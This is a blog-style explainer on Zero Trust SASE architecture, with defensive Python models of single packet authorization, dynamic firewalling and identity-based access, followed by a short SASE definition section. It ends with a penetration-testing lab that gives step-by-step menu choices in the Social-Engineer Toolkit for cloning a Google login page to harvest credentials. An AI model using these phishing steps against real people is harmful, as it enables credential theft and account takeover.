The current environmental challenge is that more users, devices, applications, services, and data are located outside an enterprise than inside. There has been a rapid rise in remote working, especially in recent times, and an increase in the adoption of cloud-based services, particularly SaaS. These changes have turned the enterprise network “inside out”, so the traditional perimeter we had is no longer useful.

Multi-cloud

Also, many organizations are adopting multi-cloud. Deploying and managing the native security offerings of multiple cloud service providers is challenging: each provider has its own management console and security capabilities, and policies are not shared or integrated between them. Technologies exist to help with this, but the cloud providers remain separate entities. To combat these environmental changes, there have been several attempts to secure the infrastructure differently.

SASE: The first attempt

Organizations have been adopting different security technologies to combat these changes and include them in their security stack. Many of the security technologies are cloud-based services. Some of these services include the cloud-based secure web gateway (SWG), content delivery network [CDN], and web application firewall [WAF]. A secure web gateway (SWG) protects users from web-based threats and applies and enforces acceptable corporate use policies. 

A content delivery network (CDN) refers to a geographically distributed group of servers working together to deliver Internet content quickly. A WAF or web application firewall helps protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet.

The data center is the center of the universe.

However, even with these welcomed additions to security, the general trend was that the data center is still the center of most enterprise networks and network security architectures. Let’s face it; these designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

SASE: Second attempt to

The next attempt was for a converged cloud-delivered secure access service edge (SASE) to accomplish this shift in the landscape. And that is what SASE architecture does. As you know, the SASE architecture relies on multiple contextual aspects to establish and adapt trust for application-level access.

It does not concern itself with large VLAN and broad-level access or believes that the data center is the center of the universe. Instead, the SASE architecture is often based on PoP, where each PoP acts as the center of the universe.

SASE and its components form a transformational architecture that can combat many of the challenges discussed. A SASE solution converges networking and security services into one unified, cloud-delivered solution that includes the following core capabilities of SASE.

From the network side of things: SASE in networking

    1. Software-defined wide area network (SD-WAN)
    2. Virtual private network (VPN)
    3. Zero trust network (ZTN)
    4. Quality of service (QoS)
    5. Software-defined perimeter (SDP)

From the security side of things: SASE capabilities in security

    1. Firewall as a service (FWaaS)
    2. Domain Name System (DNS) security
    3. Threat prevention
    4. Secure web gateways
    5. Data loss prevention (DLP)
    6. Cloud access security broker (CASB)

Zero Trust SASE: What the SASE architecture changes

SASE changes the focal point to the identity of the user and device. In traditional network design, the on-premises data center is considered the center of the universe, and the internal data center is the focal point for access. SASE changes this to match today’s environment and moves the perimeter to the actual user and device, or to the PoP in some SASE designs.

Diagram: SASE features

VPN Security Scenario 

The limitations of traditional remote access VPNs

Remote access VPNs are primarily built to allow users outside the perimeter firewall to access resources inside the perimeter firewall. As a result, they often follow a hub-and-spoke architecture with users connected by tunnels of various lengths depending on their distance from the data center. Traditional VPNs introduce a lot of complexity. For example, what do you do if you have multiple sites where users need to access applications? With this type of scenario, the cost of management would be high. 

Tunnel based on IP

What’s happening here is that the tunnel creates an extension between the client device and the application location. The tunnel is based on the IP addresses of the client device and the remote application. Once there is IP connectivity between the client and the application, the network where the application is located is extended to the client.

However, the client may be connecting from a hotel room or from home. Such locations may not be sufficiently protected and should be considered insecure. The traditional VPN has many issues to deal with: it is user-initiated, and policy often permits split-tunnel VPN, where Internet or cloud traffic receives no inspection.

SASE and VPN: A zero-trust VPN solution

A SASE solution encompasses VPN services and enhances them to operate in cloud-based infrastructure to route traffic. With SASE, the client connects to the SASE PoP, which carries out security checks and forwards the request to the application. A SASE design still allows clients to access the application, but they can access only that specific application and nothing more, like a stripped-down VLAN; this is a form of micro-segmentation.

Clients must pass security controls, and there is no broad-level access that would be susceptible to lateral movement. Access control is based on an allowlist rather than the traditional blocklist rule. Also, other variables present in the request context are used instead of IP addresses as the client identifier. As a result, the application is now the access path, not the network.

ZTNA remote access

So, no matter what type of VPN services you use, SASE provides a unified cloud to connect to instead of backhauling to a VPN gateway, simplifying management and policy control. Well-established technologies such as VPN, secure web gateway, and firewall are being reviewed and reassessed in Zero Trust remote access solutions as organizations revisit approaches that have been in place for over a decade.

A quick recommendation: SASE and SD-WAN

The value of SD-WAN is high. However, it also brings many challenges, including new security risks. In some of my consultancies, I have seen unreliable performance and increased complexity due to the need for multiple overlays. Also, these overlays need to terminate somewhere, and this will be at a hub site.

However, when combined with SASE, the SD-WAN edge devices can be connected to a cloud-based infrastructure rather than the physical SD-WAN hubs. This brings the value of interconnectivity between branch sites without the complexity of deploying or managing physical hub sites.

Diagram: SASE in networking.

Zero Trust SASE: Vendor considerations

SASE features converge various individual components into one connected, cloud-delivered service, making it easy to control policies and behaviors. The SASE architecture is often based on a PoP design. When examining the SASE vendor, the vendor’s PoP layout should be geographically diverse, with worldwide entry and exit points.

Also, considerations should be made regarding the vendor’s edge/physical infrastructure providers or colocation facilities. We can change your security posture, but we can’t change the speed of light and the laws of physics.

SASE capabilities and route optimizations

Consider how the SASE vendor routes traffic in their PoP fabric. There should be route optimization at each PoP. Some route optimizations are for high availability, while others are for performance. Does the vendor offer cold-potato or hot-potato routing? The cold-potato routing means bringing the end-user device into the provider’s network as soon as possible. On the other hand, “hot-potato routing” means the end user’s traffic traverses more of the public Internet.

The Main Zero Trust SASE Architecture Requirements List

The following is a list of considerations to review when discussing SASE with your preferred cybersecurity vendor.

Diagram: Zero trust environment

Zero Trust SASE requirements: Information hiding

A secure access service requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection originates inside or outside the network perimeter. Then, real-time encrypted connections are created between the requesting client and the protected asset. As a result, all SASE-protected servers and services are hidden from unauthorized network queries and scan attempts.

You can’t attack what you can’t see.

Network security started out by limiting visibility: you cannot attack what you cannot see. Public and private IP address ranges were placed in separate networks. This was the biggest mistake we ever made, as IP addresses are just binary whether they are deemed public or private. If a host assigned a public address wanted to communicate with a host holding a private address, it would need to go through a network address translation (NAT) device and have a permit policy set.

Security based on the visibility

Network address translation maps one IP address space into another by modifying the network address information in the IP header of packets while they are in transit across a traffic routing device. Limiting visibility this way works to a degree, but we cannot get away from the fact that a) if you have someone’s IP address, you can reach them, and b) if a port is open, you can potentially connect to it. Therefore, the traditional security method can leave your network wide open to compromise, especially when bad actors have all the tools; finding, downloading, and running a port scanning tool is not hard.

Nmap, for Network Mapper, is the most widely used port scanning tool. Nmap works by checking a network for hosts and services: once found, it sends probes to those hosts and services and waits for their responses. Nmap reads and interprets the responses and uses the data to create a network map.

Example: Single Packet Authorization

Zero Trust network security is used for information and infrastructure hiding through lightweight protocols such as a single packet authorization (SPA). No internal IP addresses or DNS information is shown, creating an invisible network.

As a result, we have zero visibility and connectivity, only establishing connectivity after clients prove they can be trusted to allow legitimate traffic. Now, we can have various protected assets hidden regardless of location: on-premise, public or private clouds, a DMZ, or a server on the internal LAN, in keeping with today’s hybrid environment.

This approach mitigates denial-of-service attacks. Anything internet-facing is reachable on the public Internet and, therefore, susceptible to bandwidth and server denial-of-service attacks. The default-drop firewall is deployed, with no visible presence to unauthorized users. Only good packets are allowed.

Zero Trust SASE tools: Single packet authorization (SPA)

Single packet authorization (SPA) also allows for attack detection. If a host receives anything other than a valid SPA packet or similar construct, it views that packet as part of a threat. The first packet to a service must be a valid SPA packet or similar security construct.

If it receives another packet type, it views this as an attack, which is helpful for bad packet detection. Therefore, SPA can determine an attack based on a single malicious packet, a highly effective way to detect network-based attacks. Thus, external network and cross-domain attacks are detected.
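The knock-then-open behaviour described in the two SPA passages above (a hidden service that accepts nothing until it sees a valid knock, and treats any other first packet as hostile) can be modelled in a few lines. The Python below is an added example for this page, not code from Cisco Umbrella or any SASE product; the shared key, client name, service name, addresses and timestamps are constructed values, and the packet format (timestamp, nonce, "client|service", HMAC-SHA256) is an assumption chosen for the illustration rather than a standard wire format.

```python
import hashlib
import hmac
import os
import struct
from typing import Tuple

# Constructed sample secret: a real deployment provisions one secret per client.
SHARED_KEY = b"example-spa-secret-for-this-page"
WINDOW_SECONDS = 30   # a knock whose timestamp is further from "now" than this is rejected
NONCE_LEN = 16
TAG_LEN = 32          # HMAC-SHA256 output length
MIN_LEN = 4 + NONCE_LEN + TAG_LEN + 3   # timestamp + nonce + tag + at least "a|b"


def build_spa_packet(key: bytes, client_id: str, service: str, now: int) -> bytes:
    """Client side: one datagram = timestamp || nonce || "client|service" || HMAC.

    Assumed format for this example; client_id must not itself contain '|'.
    """
    body = struct.pack("!I", now) + os.urandom(NONCE_LEN) + f"{client_id}|{service}".encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body + tag


class SpaGate:
    """Server side. Default-drop: the first packet from a source must be a valid knock.

    Anything else is dropped and recorded as an alert, which is the single-packet
    attack detection the text describes.
    """

    def __init__(self, key: bytes):
        self.key = key
        self.seen_nonces = {}   # nonce -> timestamp, replay protection inside the window
        self.alerts = []        # one line per dropped packet

    def check(self, datagram: bytes, src: str, now: int) -> Tuple[bool, str]:
        # Forget nonces that can no longer be replayed: their timestamp left the window.
        self.seen_nonces = {n: t for n, t in self.seen_nonces.items()
                            if abs(now - t) <= WINDOW_SECONDS}
        if len(datagram) < MIN_LEN:
            return self._drop(src, "malformed or non-SPA packet")
        body, tag = datagram[:-TAG_LEN], datagram[-TAG_LEN:]
        expected = hmac.new(self.key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):      # constant-time comparison
            return self._drop(src, "bad HMAC")
        ts = struct.unpack("!I", body[:4])[0]
        nonce = body[4:4 + NONCE_LEN]
        if abs(now - ts) > WINDOW_SECONDS:
            return self._drop(src, "stale timestamp")
        if nonce in self.seen_nonces:
            return self._drop(src, "replayed knock")
        self.seen_nonces[nonce] = ts
        # The HMAC verified, so the body was produced by a holder of the key.
        client_id, service = body[4 + NONCE_LEN:].decode().split("|", 1)
        return True, f"{client_id} authorized for {service}"

    def _drop(self, src: str, reason: str) -> Tuple[bool, str]:
        self.alerts.append(f"DROP src={src} reason={reason}")
        return False, reason


if __name__ == "__main__":
    gate = SpaGate(SHARED_KEY)
    knock = build_spa_packet(SHARED_KEY, "alice-laptop", "ssh", now=1_700_000_000)
    print(gate.check(knock, "198.51.100.7", now=1_700_000_005))   # valid knock
    print(gate.check(knock, "198.51.100.7", now=1_700_000_006))   # same datagram again: replay
    print(gate.check(b"SSH-2.0-OpenSSH_9.6\r\n", "203.0.113.9", now=1_700_000_006))  # plain probe
    print(*gate.alerts, sep="\n")
```

Running it prints one accepted knock, then a replay rejection and a plain SSH banner dropped as a non-SPA packet, with one alert line per drop. Two caveats a practitioner would want: the replay cache only needs to hold nonces for the timestamp window, which is why it is pruned on every check, and a default-drop gate hides the service from scans but does not stop packets from arriving on the link, so bandwidth-exhaustion attacks still need upstream filtering.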

Diagram: Single packet authorization (SPA)

Zero Trust SASE architecture requirements: Mutually encrypted connections

Transport Layer Security (TLS) is an encryption protocol that protects data as it moves between computers. When two computers exchange data, they agree to encrypt the information in a way they both understand. TLS was designed to provide mutual device authentication before enabling confidential communication over the public Internet.

However, the standard TLS configuration only validates that the client is connected to a trusted entity. So, typical TLS deployments authenticate servers to clients, not clients to servers.

Mutually encrypted connections

SASE uses the full TLS standard to provide mutual, two-way cryptographic authentication. Mutual TLS provides this and goes one step further to authenticate the client. Mutual TLS connections are set up between all components in the SASE architecture.

Mutual Transport Layer Security (mTLS) is a process that establishes an encrypted TLS connection in which both parties use X.509 digital certificates to authenticate each other. mTLS can help mitigate the risk of moving services to the cloud and can help prevent malicious third parties from imitating genuine apps.

Firstly, this offers robust device and user authentication, as connections from unauthorized users and devices are blocked. Secondly, forged certificates, used in attacks aimed at credential theft, are rejected. This reduces impersonation attacks in which a bad actor presents a certificate forged through a compromised certificate authority.

Zero Trust SASE architecture requirements: Need to know the access model

Thirdly, SASE employs a need-to-know access model: it permits the requesting client to view only the resources allowed by the assigned policy. Users are bound to their devices, and both are validated against policy. Only connections to the specifically requested service are enabled; no connection is allowed to any other service.

SASE provides additional information, such as who made the connection, from what device, and to what service. All these give you full visibility into all the established connections, which is pretty hard to do if you have an IP-based solution. So now we have a contextual aspect of determining the level of risk. As a result, it makes forensics easier. The SASE architecture only accepts good packets; bad packets can be analyzed and tracked for forensic activities.

A key point: Device validation

SASE also enforces device validation, which helps against threats from unauthorized devices. Not only can we examine the requesting user, we can also validate the device. Device validation ensures that the machine is running trusted hardware and is being used by the appropriate user.

Finally, suppose a device does become compromised. In that case, there is a complete lockdown on lateral movements as a user is only allowed access to the resource it is authorized to. Or they could be placed into a sandbox zone where human approval must intervene and assess the situation.

Zero Trust SASE architecture requirements: Dynamic access control

The traditional 5-tuple firewall is limited in scope, as it cannot express or enforce rules based on identity information, which you can do with zero trust identity. Rather than attempting to model identity-centric control within the limitations of the 5-tuple, SASE can be used alongside traditional firewalls and take over the network access control enforcement that we try to do with conventional firewalls.

SASE deploys a dynamic firewall that starts with one rule: deny all. Requested communication is then dynamically inserted into the firewall, providing an active firewall security policy instead of static configurations. For example, every packet hitting the firewall is inspected with single packet authorization (SPA) and then quickly verified for a connection request.

Diagram: Zero trust capabilities

A key point: Dynamic firewall

Once the session is established, the firewall is closed again. Therefore, the firewall is dynamically opened only for a specific period. The connections made are not seen by rogues outside the network or by other users within the network domain.

This allows dynamic, membership-based enclaves that prevent network-based attacks. SASE dynamically binds users to devices, enabling those users to access protected resources by dynamically creating and removing firewall rules.

Access to protected resources is facilitated by dynamically creating and removing inbound and outbound access rules. Therefore, we now have more precise access control mechanisms and considerably fewer firewall rules.
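The rule lifecycle described above (deny all by default, insert an allow rule for an authorized session, remove it when the session ends or its window closes) is shown in the following Python model. It is an added example written for this page, not a vendor implementation; session ids, user and device names, addresses, ports and the time values are constructed, and the model assumes the caller invokes open_session only after the knock and policy checks have passed.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class SessionRule:
    """One dynamically inserted rule: a single user+device to a single service, with an expiry."""
    user: str
    device: str
    src: str
    dst: str
    dport: int
    expires_at: int


@dataclass
class DynamicFirewall:
    """Starts with one rule, deny all. Every allow rule is tied to an authorized session."""
    rules: Dict[str, SessionRule] = field(default_factory=dict)   # session id -> rule
    audit: List[str] = field(default_factory=list)                # every decision and rule change

    def open_session(self, session_id: str, user: str, device: str,
                     src: str, dst: str, dport: int, ttl: int, now: int) -> None:
        """Assumed to be called only after the SPA knock and policy checks passed."""
        self.rules[session_id] = SessionRule(user, device, src, dst, dport, now + ttl)
        self.audit.append(f"OPEN {session_id} user={user} device={device} "
                          f"{src}->{dst}:{dport} ttl={ttl}s")

    def close_session(self, session_id: str, reason: str) -> None:
        """Remove a rule explicitly, e.g. the session ended or the risk level changed."""
        rule = self.rules.pop(session_id, None)
        if rule is not None:
            self.audit.append(f"CLOSE {session_id} user={rule.user} reason={reason}")

    def expire(self, now: int) -> None:
        """Remove rules whose window has passed; the firewall is closed again by default."""
        for sid in [s for s, r in self.rules.items() if r.expires_at <= now]:
            self.close_session(sid, "expired")

    def evaluate(self, src: str, dst: str, dport: int, now: int) -> Tuple[bool, str]:
        """Decide one packet. Returns (allowed, detail); detail carries the session context."""
        self.expire(now)
        for sid, rule in self.rules.items():
            if (rule.src, rule.dst, rule.dport) == (src, dst, dport):
                return True, f"session={sid} user={rule.user} device={rule.device}"
        self.audit.append(f"DENY {src}->{dst}:{dport} no matching session")
        return False, "default deny"


if __name__ == "__main__":
    fw = DynamicFirewall()
    print(fw.evaluate("10.1.1.5", "10.9.0.20", 443, now=100))        # nothing open yet
    fw.open_session("s1", "alice", "laptop-7", "10.1.1.5", "10.9.0.20", 443, ttl=300, now=100)
    print(fw.evaluate("10.1.1.5", "10.9.0.20", 443, now=150))        # the requested service
    print(fw.evaluate("10.1.1.5", "10.9.0.20", 22, now=150))         # lateral move: denied
    print(fw.evaluate("10.1.1.5", "10.9.0.20", 443, now=400))        # window closed: denied
    print(*fw.audit, sep="\n")
```

Every decision and rule change lands in the audit list with the user and device bound to the rule, which is the forensic context the text says IP-only solutions lack. Note that a second service on the same host is denied even for the source that holds a session, and that the rule table is empty again once the session expires.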

Zero Trust SASE architecture requirement: Micro perimeter

Traditional applications were grouped into VLANs whether or not they offered similar services, and everything on that VLAN was reachable. The VLAN was a performance construct to break up broadcast domains; it was pushed into the security world but was never meant to be there.

Its prime use was to increase performance. However, it was used for security in what we know as traditional zone-based networking. The segments in zone-based networks are too large and often contain different devices with different security levels and requirements.

Logical-access boundary

SASE enables this by creating a logical access boundary encompassing a user and an application or set of applications, and nothing more. Therefore, instead of the traditional main inside/outside perimeter, we have many virtual micro perimeters specific to the business. Virtual perimeters allow you to grant access to the particular application, not the underlying network or subnet.

Diagram: SASE and micro perimeters

Reduce the attack surface.

The smaller micro perimeters reduce the attack surface and limit the need for excessive access to all ports and protocols or all applications. These individualized “virtual perimeters” encompass only the user, the device, and the application. They are created specifically for the session and closed again when the session is over or when the risk level changes and the device or user needs to perform step-up authentication.

Software-defined perimeter (SDP)

Also, SASE grants access only to the specific application, at the application layer. The SDP part of SASE controls which devices and applications can access particular services at an application level. Permitted by a policy granted by the SDP part of SASE, machines can access only particular hosts and services and cannot access network segments and subnets.

Broad network access is eliminated, reducing the attack surface to an absolute minimum. SDP provides a fully encrypted application communication path. The application binding permits only authorized applications to communicate through the established encrypted tunnels, blocking all other applications from using them.

This creates a dynamic perimeter around the application, including the connected users and devices. Furthermore, it offers a narrow access path, reducing the attack surface to an absolute minimum.

Zero Trust SASE architecture requirement: Identity-driven access control

Traditional network solutions provide coarse-grained network segmentation based on someone’s IP address. However, an IP address is not a good hook for security and does not provide much information about user identity. SASE enables the creation of microsegmentation based on user-defined controls, allowing a 1-to-1 mapping, unlike a VLAN, where there is the potential to see everything within that VLAN.

Identity-aware access

SASE provides adaptive, identity-aware, precision access for those seeking more precise access and session control to applications on-premises and in the cloud. Access policies are primarily based on user, device, and application identities.

The policy is applied independently of the user’s physical location or the device’s IP address, unless the policy itself restricts on those attributes. This brings a lot more context to policy application. Therefore, if a bad actor gains access to one segment in the zone, they are prevented from compromising any other network resource.
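To show that the decision keys on who and what is asking rather than on the address it comes from, here is a small policy engine in Python. It is an added example for this page, not Cisco Umbrella's or any other product's logic; the application names, groups, device attributes and the policy table are constructed, and the posture checks (managed device, disk encryption, patch age) are assumptions chosen to illustrate device validation.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple


@dataclass(frozen=True)
class Device:
    device_id: str
    managed: bool             # enrolled in the organisation's device management
    disk_encrypted: bool
    patch_age_days: int       # days since the last OS patch


@dataclass(frozen=True)
class Request:
    user: str
    groups: FrozenSet[str]
    device: Device
    app: str
    src_ip: str               # recorded for the audit trail; the decision never keys on it


# Constructed policy: which identities may reach which application, and what device state they need.
POLICY: Dict[str, dict] = {
    "payroll":      {"groups": {"finance"}, "managed_only": True, "max_patch_age": 30},
    "wiki":         {"groups": {"finance", "engineering", "contractors"},
                     "managed_only": False, "max_patch_age": 90},
    "ci-dashboard": {"groups": {"engineering"}, "managed_only": True, "max_patch_age": 30},
}


def device_checks(device: Device, rule: dict) -> List[str]:
    """Posture failures for this device against one application's rule (empty means compliant)."""
    failures = []
    if rule["managed_only"] and not device.managed:
        failures.append("unmanaged device")
    if not device.disk_encrypted:
        failures.append("disk not encrypted")
    if device.patch_age_days > rule["max_patch_age"]:
        failures.append(f"patch age {device.patch_age_days}d exceeds {rule['max_patch_age']}d")
    return failures


def decide(req: Request) -> Tuple[str, str]:
    """Per-request decision. Returns ("ALLOW" or "DENY", reason carrying who/what/where)."""
    ctx = f"user={req.user} device={req.device.device_id} app={req.app} src={req.src_ip}"
    rule = POLICY.get(req.app)
    if rule is None:
        return "DENY", f"{ctx}: unknown application"
    if not (req.groups & rule["groups"]):
        return "DENY", f"{ctx}: identity not entitled to application"
    failures = device_checks(req.device, rule)
    if failures:
        return "DENY", f"{ctx}: device posture: " + ", ".join(failures)
    return "ALLOW", ctx


def visible_apps(groups: FrozenSet[str], device: Device) -> List[str]:
    """Need-to-know: the only applications this identity on this device can even see."""
    return sorted(app for app, rule in POLICY.items()
                  if groups & rule["groups"] and not device_checks(device, rule))


if __name__ == "__main__":
    laptop = Device("laptop-7", managed=True, disk_encrypted=True, patch_age_days=5)
    phone = Device("phone-3", managed=False, disk_encrypted=True, patch_age_days=5)
    ip = "198.51.100.7"   # the same address for every request below
    print(decide(Request("alice", frozenset({"finance"}), laptop, "payroll", ip)))
    print(decide(Request("bob", frozenset({"contractors"}), laptop, "payroll", ip)))
    print(decide(Request("alice", frozenset({"finance"}), phone, "payroll", ip)))
    print(visible_apps(frozenset({"contractors"}), phone))
```

The same source address yields ALLOW for a finance user on a managed laptop, DENY for a contractor on the same machine, and DENY for the finance user on an unmanaged phone; visible_apps returns the need-to-know list, so a contractor never learns that payroll exists.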

Implications for the Future:

Zero Trust SASE represents the future of network security as organizations increasingly adopt cloud-based applications and embrace remote workforces. With the proliferation of IoT devices, edge computing, and hybrid cloud environments, traditional security models are no longer sufficient to protect critical assets.

Zero Trust SASE provides a holistic and adaptive approach to security, ensuring that organizations can defend against evolving threats and maintain a strong security posture in the digital era.

 

Summary: Zero Trust SASE

In today’s rapidly evolving digital landscape, where remote work and cloud-based applications have become the norm, traditional security measures are no longer sufficient. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines network security and wide-area networking into a unified framework. In this blog post, we explored the concept of Zero Trust SASE and its implications for the future of cybersecurity.

Section 1: Understanding Zero Trust

Zero Trust is a security framework that operates under the principle of “never trust, always verify.” It assumes no user or device should be inherently trusted, regardless of location or network. Instead, Zero Trust focuses on continuously verifying and validating identity, access, and security parameters before granting any level of access.

Section 2: The Evolution of SASE

Secure Access Service Edge (SASE) represents a convergence of network security and wide-area networking capabilities. It combines security services, such as secure web gateways, firewall-as-a-service, and data loss prevention, with networking functionalities like software-defined wide-area networking (SD-WAN) and cloud-native architecture. SASE aims to provide comprehensive security and networking services in a unified, cloud-delivered model.

Section 3: The Benefits of Zero Trust SASE

a) Enhanced Security: Zero Trust SASE brings a holistic approach to security, ensuring that every user and device is continuously authenticated and authorized. This reduces the risk of unauthorized access and mitigates potential threats.

b) Improved Performance: By leveraging cloud-native architecture and SD-WAN capabilities, Zero Trust SASE optimizes network traffic, reduces latency, and enhances overall performance.

c) Simplified Management: With a unified security and networking framework, organizations can streamline their management processes, reduce complexity, and achieve better visibility and control over their entire network infrastructure.

Section 4: Implementing Zero Trust SASE

a) Comprehensive Assessment: Before adopting Zero Trust SASE, organizations should conduct a thorough assessment of their existing security and networking infrastructure, identify vulnerabilities, and define their security requirements.

b) Architecture Design: Organizations need to design a robust architecture that aligns with their specific needs and integrates Zero Trust principles into their existing systems. This may involve deploying virtualized security functions, adopting SD-WAN technologies, and leveraging cloud services.

c) Continuous Monitoring and Adaptation: Zero Trust SASE is an ongoing process that requires continuous monitoring, analysis, and adaptation to address emerging threats and evolving business needs. Regular security audits and updates are crucial to maintaining a solid security posture.

Conclusion:

Zero Trust SASE represents a paradigm shift in cybersecurity, providing a comprehensive and unified approach to secure access and network management. By embracing the principles of Zero Trust and leveraging the capabilities of SASE, organizations can enhance their security, improve performance, and simplify their network infrastructure. As the digital landscape continues to evolve, adopting Zero Trust SASE is not just an option—it’s a necessity to safeguard the future of our interconnected world.


SASE Definition


In today's digital landscape, organizations constantly seek ways to enhance network security, simplify infrastructure, and optimize performance. One emerging concept that has gained significant attention is Secure Access Service Edge (SASE). In this blog post, we will delve into the definition of SASE, its key components, and how it can revolutionize how businesses approach network and security architecture.

Secure Access Service Edge (SASE) is a transformative network architecture model that combines network and security services into a unified cloud-native solution. It offers a holistic approach to networking, allowing organizations to connect securely to cloud resources, applications, and data centers, regardless of their location or the devices being used.


Highlights: SASE Definition

Multiple network and security functions 

SASE, or Secure Access Service Edge, is a modern networking solution that combines multiple security functions into a single platform. This solution is designed to provide secure access to cloud-based applications, data, and services. SASE architecture is built on top of a cloud-native platform that integrates software-defined wide-area networking (SD-WAN) with security functions like secure web gateway (SWG), cloud access security broker (CASB), firewall as a service (FWaaS), and zero-trust network access (ZTNA).

Traditional complex methods

SASE is becoming increasingly popular among organizations because it provides a more flexible and cost-effective approach to networking and security. The traditional approach to networking and security involves deploying multiple devices or appliances, each with its own set of functions. This approach can be complex, time-consuming, and expensive to manage. SASE, on the other hand, simplifies this by integrating all the necessary functions into a single platform.

SASE: A scalable approach

SASE also provides a more scalable and adaptable solution for organizations adopting cloud-based applications and services. With SASE, organizations can connect to cloud-based platforms like AWS, Azure, or Google Cloud, ensuring secure data and application access. Additionally, SASE provides better visibility and control over network traffic, allowing organizations to monitor and manage their network more effectively.

SASE definition

Related: For additional pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Solution
  3. Security Automation
  4. SASE Model
  5. Cisco Secure Firewall
  6. eBOOK on SASE



SASE Definition

Key SASE Meaning Discussion Points:


  • New phase of WAN transformation.

  • WAN challenges and how SASE solves them.

  • Challenge: Managing the network.

  • Challenge: Site connectivity.

  • Challenge: Site performance.

  • Challenge: Cloud agility.

  • Challenge: Security.

Vendor Example: Cisco Umbrella

The Power of Secure Access Service Edge (SASE)

One of the key concepts associated with Cisco Umbrella is Secure Access Service Edge (SASE). SASE combines network security and wide-area networking (WAN) capabilities into a single cloud-native service. By converging multiple security functions such as secure web gateways, firewall-as-a-service, and data loss prevention, SASE provides a unified and simplified approach to network security. Cisco Umbrella is crucial in the SASE framework by seamlessly integrating cloud security services with the network.

Key Features and Benefits

Cisco Umbrella offers a range of powerful features that enhance network security. These include threat intelligence, advanced malware protection, secure internet gateway, and DNS-layer security. By leveraging the power of machine learning and data analytics, Umbrella continuously analyzes global internet activity to identify and block threats in real-time. Moreover, its intuitive dashboard gives administrators granular visibility and control over network traffic, enabling them to make informed decisions and respond swiftly to potential threats.

Diagram: Cisco Umbrella. Source: Cisco.

SASE: A Cloud-Centric Approach

Firstly, the meaning of SASE comes down to the environment we are in. In a cloud-centric world, users and devices require access to services everywhere. The focal point has changed: it is now the identity of the user and device, whereas the traditional model focused solely on the data center and its many network security components. These environmental changes have created a new landscape that we must protect and connect.

Many common problems challenge the new landscape. Because appliances are deployed for different technology stacks, enterprises are loaded with complexity and overhead. Legacy network and security designs increase latency. In addition, most traffic is now encrypted, and with Zero Trust SASE it needs to be inspected without degrading application performance.

These are reasons to leverage a cloud-delivered secure access service edge (SASE). SASE means a tailored network fabric, optimized where it makes the most sense for the user, device, and application: at geographically dispersed PoPs that enable technologies to secure your environment, such as single packet authorization.

Diagram: SASE explained. Source: Fortinet.

SASE Meaning

Main SASE Definition Components

SASE – Secure Access Service Edge

  • Network as a Service (NaaS)

  • Security as a Service (SECaaS)

  • Zero-Trust Architecture

  • Cloud-Native Architecture

Components of SASE:

1. Network as a Service (NaaS): SASE integrates network services such as SD-WAN (Software-Defined Wide Area Network) and cloud connectivity to provide organizations with a flexible and scalable network infrastructure. With NaaS, businesses can optimize network performance, reduce latency, and ensure reliable connectivity across different environments.

2. Security as a Service (SECaaS): SASE incorporates various security services, including secure web gateways, firewall-as-a-service, data loss prevention, and zero-trust network access. By embedding security into the network infrastructure, SASE enables organizations to enforce consistent security policies, protect against threats, and simplify the management of security measures.

3. Zero-Trust Architecture: SASE adopts a zero-trust approach, which assumes that no user or device should be trusted by default, even within the network perimeter. By implementing continuous authentication, access controls, and micro-segmentation, SASE ensures that every user and device is verified before accessing network resources, reducing the risk of unauthorized access and data breaches.

4. Cloud-Native Architecture: SASE leverages cloud-native technologies to provide a scalable, agile, and elastic network and security infrastructure. By transitioning from legacy hardware appliances to software-defined solutions, SASE enables organizations to respond more quickly to changing business requirements, reduce costs, and improve overall efficiency.

Benefits of SASE:

1. Enhanced Security: By integrating security into the network infrastructure, SASE provides a unified and consistent security approach across all network edges, reducing potential vulnerabilities and simplifying security management.

2. Increased Agility: SASE enables organizations to adapt quickly to changing business requirements by providing on-demand network and security services that can be rapidly provisioned and scaled.

3. Improved User Experience: With SASE, users can securely access applications and resources from anywhere, on any device, without compromising performance or experiencing network congestion.

4. Cost Savings: By consolidating network and security services into a single cloud-native solution, organizations can reduce hardware and maintenance costs, streamline their infrastructure, and optimize resource utilization.

Secure Access Service Edge

SASE Advantages

Cloud Delivered: Network and Security

  • Unified and consistent security to all edges.

  • Increased agility with on-demand network and security services

  • Improved user experience. Same access from all locations.

  • Cost savings with a single cloud-native solution.

Secure Access Service Edge

SASE Technologies

Cloud Delivered: Network and Security

  • SD-WAN

  • Cloud Access Security Broker (CASB)

  • NGFW and Firewall as a service

  • Zero Trust Network Access (ZTNA)

  • Secure Web Gateway (SWG)

 

Lab Guide: Phishing Attacks

The Social-Engineer Toolkit (SET)

In this lab, we have a fake Google login page that we can use to capture the username and password. This process is known as phishing, and here, I will use the Social-Engineer Toolkit (SET), specifically designed to perform advanced attacks against the human element. 

Note:

SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester’s arsenal. The attacks built into the toolkit are intended to be focused attacks against a person or organization used during a penetration test. There are a couple of steps to perform, and I’m using Kali Linux.

  1. Once the Social Engineering Toolkit loads, select 1) Social-Engineering Attacks from the menu. 
  2. Select 2) Website Attack Vectors from the following menu. 
  3. Select 3) Credential Harvester Attack Method from the following menu. 
  4. Select 1) Web Templates from the next menu.
  5. The following prompt will ask for your IP address for the POST request. The default IP [xx.xx.xx.xx] is correct, so hit Enter here.
  6. Next, select the 2—Google template. 

The credential harvester attack is a phishing attack where attackers create deceptive websites or emails to trick unsuspecting victims into providing their login credentials. These malicious actors often mimic legitimate websites or services, luring users into entering their usernames, passwords, or other sensitive information.

Techniques Employed by Credential Harvesters

Credential harvesters employ various techniques to make their attacks more convincing. They may use URL manipulation, where the website’s URL appears genuine, but in reality, it redirects to a fraudulent page designed to capture user credentials. Another method involves creating spoofed emails with links that lead to imitation login pages.

Consequences of Falling Victim to Credential Harvesters

The consequences of falling victim to credential harvesters can be severe. Once attackers obtain login credentials, they can gain unauthorized access to personal accounts, financial information, or corporate networks. This can result in identity theft, financial loss, reputational damage, and compromised privacy.

Analysis: 

